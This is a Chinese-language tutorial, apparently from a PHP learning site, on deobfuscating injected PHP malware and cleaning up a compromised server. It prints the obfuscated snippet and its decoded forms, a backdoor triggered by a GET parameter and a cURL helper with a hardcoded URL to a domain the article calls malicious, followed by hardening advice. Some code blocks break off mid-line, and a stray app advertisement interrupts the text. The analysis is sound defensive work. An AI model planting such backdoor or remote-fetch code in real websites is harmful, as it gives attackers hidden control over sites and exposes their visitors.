PHP 代码去混淆实践：恶意注入分析与清理指南

PHP 恶意代码去混淆：逐步解析与安全实践

在 web 开发中，服务器被注入恶意代码是一种常见的安全威胁。这些恶意代码通常会经过混淆处理，以逃避检测并增加分析难度。本教程将以一个具体的 php 混淆代码片段为例，详细讲解如何一步步对其进行去混淆，揭示其真实功能，并探讨其潜在的安全风险。

1. 初始混淆代码分析

首先，我们来看这段被发现注入到服务器文件中的 PHP 代码片段：

这段代码的特点是使用了大量难以阅读的变量名（如 $OOOOOO、$oOooOOoO 等），以及通过字符串索引（如 $O{21}）来构建新的字符串，这使得代码的真实意图变得模糊。error_reporting(0) 旨在抑制所有错误报告，进一步隐藏其行为。
2. 逐步去混淆
去混淆过程需要耐心和细致，我们将按照以下步骤进行：
2.1 解码 $OOOOOO 变量
代码的第一步是将 $OOOOOO 变量进行 URL 解码，并赋值给全局变量 $O。这是去混淆的关键第一步，因为它定义了后续所有字符串构建的基础字符集。
立即学习“PHP免费学习笔记（深入）”；
$OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c"; 
global $O; 
$O=urldecode($OOOOOO);

// 解码后，$O 的内容如下：
// $O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-\"?> <.-=:/1230654879';()&^$[]\\%{}!*|+,";
这个字符串包含了英文字母（大小写）、数字、特殊符号等，看起来像是键盘上的字符顺序排列。
2.2 替换字符串索引访问
接下来，代码中大量使用了 $O{x} 这种（在 PHP 7.4+ 中已弃用，但在旧版本中有效）的字符串索引访问方式来获取单个字符并拼接成新的字符串。我们需要将所有这些 $O{x} 表达式替换为其对应的实际字符。
例如，$O{21} 对应 $O 字符串中的第22个字符（索引从0开始），即 'c'。

							

								
								

									Videoleap
									
Videoleap是一个一体化的视频编辑平台
								
								下载 
							
						
经过替换后，代码片段将变为：
if($_GET["c"."h"."e"."n"]=="5"."1"."-"."c"."n"){
    $oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
    $oooOoOoOoOoooooOOooo = explode("<"."?"."p"."h"."p",$oooOoOoOoooOooOOooooo);
    if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){ 
        echo "["."o"."k"."!"."]";
        exit;
    }else{
        echo "["."f"."a"."i"."l"."!"."]";
        exit;
    }
}

$oOooOO='z0807_1';
$oOooOOoO="h"."t"."t"."p".":"."/"."/".$oOooOO."."."a"."g"."o"."o"."d"."s"."."."t"."o"."p"; 
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
    $ooooOOOooOo=curl_init();
    curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
    curl_close($ooooOOOooOo);
    return $oooooOOOOooO; 
}
2.3 合并字符串字面量
为了提高可读性，我们可以将通过 . 运算符连接的字符串字面量合并成一个完整的字符串。
if($_GET["chen"]=="51-cn"){
    $oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
    $oooOoOoOoOoooooOOooo = explode("
2.4 变量重命名与代码格式化
最后一步是重命名那些混淆的变量，使其具有描述性，并对代码进行格式化，使其更符合标准的可读性规范。同时，将长行代码拆分成多行，提高清晰度。
if($_GET["chen"]=="51-cn"){
    $thisFileSource = file_get_contents(__FILE__);
    $parts = explode("
3. 代码功能分析与潜在风险
去混淆后的代码揭示了其主要功能：

条件执行检查:
代码首先检查 $_GET 参数中是否存在 chen 键，并且其值是否为 51-cn。如果条件满足，则执行后续逻辑。这通常是一个后门或特定触发机制。

文件内容自检:
如果条件满足，代码会读取当前文件（__FILE__）的全部内容，然后以 

如果包含，则输出 [ok!] 并退出。
如果不包含，则输出 [fail!] 并退出。

分析: 这种自检机制看起来有些多余，因为如果代码本身不存在，它就不会运行。如果存在，它总会包含 %71%77%65 (即 $OOOOOO 变量的开头部分)。这可能是为了验证代码的完整性或作为某种调试/确认机制。


外部请求函数定义:
代码定义了一个名为 sendRequest (原 ooooooooOOOOOOOOoooooOOO) 的函数，该函数使用 cURL 库向指定的 URL 发送 GET 请求，并返回响应内容。
同时，它构建了一个 URL http://z0807_1.agoods.top，但在这个代码片段中，该 URL 并没有被 sendRequest 函数实际调用。
潜在风险:


未执行的外部请求: 虽然 sendRequest 函数和目标 URL 被定义了，但在这个片段中并未被调用。这强烈暗示在服务器上可能存在其他被注入的代码，会调用这个函数，或者这个片段本身只是一个更大恶意脚本的一部分。攻击者通常会通过这种方式从远程服务器获取更多恶意内容，例如广告、重定向脚本、钓鱼页面或更高级的恶意负载。

域名 agoods.top: 对 agoods.top 域名的调查显示，它与许多被劫持的网站和恶意活动相关，例如强制用户重定向到虚假的“浏览器更新”页面。这进一步证实了这段代码的恶意性质。

error_reporting(0): 禁用错误报告是恶意代码的典型特征，旨在避免在执行过程中暴露任何错误信息，从而隐藏其存在和行为。



4. 防范与清理建议


立即隔离: 如果发现此类代码，应立即将受感染的服务器或文件隔离，防止进一步传播或损害。

完整扫描与清理: 对服务器进行全面的恶意软件扫描，查找所有被注入的文件。手动检查所有 PHP 文件，特别是入口文件、公共函数库以及经常被修改的文件。

日志分析: 检查 Web 服务器（如 Apache/Nginx）和 PHP 错误日志，寻找异常请求模式、可疑的 IP 地址或文件访问记录。

更新与打补丁: 确保所有软件（操作系统、Web 服务器、PHP 版本、CMS 系统及插件）都更新到最新版本，并应用所有安全补丁。

强化安全配置:

禁用不必要的 PHP 函数（如 eval、shell_exec、system 等）。
限制文件上传权限和执行权限。
使用 Web 应用防火墙 (WAF) 过滤恶意请求。
定期备份数据。



代码审计: 定期对网站代码进行安全审计，查找潜在的漏洞和恶意注入点。

密码安全: 更改所有服务器和数据库密码，确保使用强密码。

总结
去混淆恶意 PHP 代码是识别和应对 Web 安全威胁的关键步骤。通过本文的逐步解析，我们可以看到，即使是看似复杂的混淆代码，通过系统性的分析也能揭示其真实面目。这段代码不仅包含一个用于触发的后门条件，还定义了一个用于外部通信的 cURL 函数，并指向一个已知的恶意域名。理解这些恶意机制有助于我们更好地防范未来的攻击，并采取有效的清理措施来保护服务器和用户数据。